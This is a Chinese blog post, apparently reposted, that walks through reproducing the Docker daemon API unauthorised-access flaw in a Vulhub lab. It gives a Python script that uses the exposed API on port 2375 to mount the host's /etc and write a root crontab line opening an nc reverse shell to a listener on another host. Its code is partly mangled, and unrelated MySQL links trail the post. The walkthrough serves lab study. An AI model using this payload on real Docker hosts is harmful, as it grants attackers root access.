博客
关于我
docker daemon api 未授权访问漏洞复现
阅读量:650 次
发布时间:2019-03-13

本文共 1332 字,大约阅读时间需要 4 分钟。

Docker Daemon API 未授权访问漏洞复现

环境搭建

要复现该漏洞,首先需要一个功能正常的Docker环境。请按照以下步骤操作:

  • 启动Docker服务

    使用以下命令启动Docker服务:

    systemctl start docker
  • 获取VulHub镜像

    克隆包含漏洞示例的GitHub仓库:

    git clone --depth=1 https://github.com/vulhub/vulhub.git  ``
  • 进入目标目录

    使用以下命令进入VulHub中的相关子目录:

    cd vulhub/docker/unauthorized-rce/
  • 启动漏洞示例容器

    使用Docker Compose启动一个Remind容器,该容器会用于触发漏洞:

    docker-compose up -d
  • 验证容器状态

    使用以下命令查看当前运行的容器状态:

    docker ps

    容器应显示一个名为"unauthorized-rce"的容器运行中。此时,可以通过浏览器访问http://127.0.0.1:2375/version验证Docker Daemon API的状态。

  • 漏洞复现

    接下来,我们将引入一个简单的验证脚本来测试漏洞:

  • 获取远程主机IP地址

    确认Kali和CentOS主机的IP地址,例如:

    • Kali:192.138.164.134
    • CentOS:192.168.42.133
  • 启动 listener 监听4444端口

    在Kali机器上使用Netcat监听4444端口:

    nc -lvvp 4444
  • 测试漏洞

    在CentOS机器上运行以下命令,尝试绕过Docker Daemon的权限检查:

    import dockerclientfrom dockerclient import DockerClientclient = DockerClient(base_url='http://192.168.42.133:2375/')data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.138.164.134 4444 -e /bin/sh' > /tmp/etc/crontabs/root" ''', remove=True, volumes={ '/etc': { 'bind': '/tmp/etc', 'mode': 'rw' }})
  • 验证

    当脚本运行完成后,您应该看到以下内容:

  • 腥鸭在Kali机器上显示正处于监听状态(如下图):

    [#] nc -lvvp 4444(Waiting for connection...)
  • 脚本在CentOS机器上成功绕过权限检查,生成cron文件:

    sh -c "echo '* * * * * /usr/bin/nc 192.138.164.134 4444 -e /bin/sh' > /tmp/etc/crontabs/root"
  • 这样,说明我们成功触发了Docker Daemon API 的未授权访问漏洞。

    参考资料

    更多技术细节,请参考以下链接:

    GitHub仓库 README

    转载地址:http://nxzaz.baihongyu.com/

    你可能感兴趣的文章
    mysql generic安装_MySQL 5.6 Generic Binary安装与配置_MySQL
    查看>>
    Mysql group by
    查看>>
    MySQL I 有福啦,窗口函数大大提高了取数的效率!
    查看>>
    mysql id自动增长 初始值 Mysql重置auto_increment初始值
    查看>>
    MySQL in 太多过慢的 3 种解决方案
    查看>>
    Mysql Innodb 锁机制
    查看>>
    MySQL InnoDB中意向锁的作用及原理探
    查看>>
    MySQL InnoDB事务隔离级别与锁机制深入解析
    查看>>
    Mysql InnoDB存储引擎 —— 数据页
    查看>>
    Mysql InnoDB存储引擎中的checkpoint技术
    查看>>
    Mysql InnoDB存储引擎中缓冲池Buffer Pool、Redo Log、Bin Log、Undo Log、Channge Buffer
    查看>>
    MySQL InnoDB引擎的锁机制详解
    查看>>
    Mysql INNODB引擎行锁的3种算法 Record Lock Next-Key Lock Grap Lock
    查看>>
    mysql InnoDB数据存储引擎 的B+树索引原理
    查看>>
    mysql innodb通过使用mvcc来实现可重复读
    查看>>
    mysql interval显示条件值_MySQL INTERVAL关键字可以使用哪些不同的单位值?
    查看>>
    Mysql join原理
    查看>>
    mysql order by多个字段排序
    查看>>
    MySQL Order By实现原理分析和Filesort优化
    查看>>
    mysql problems
    查看>>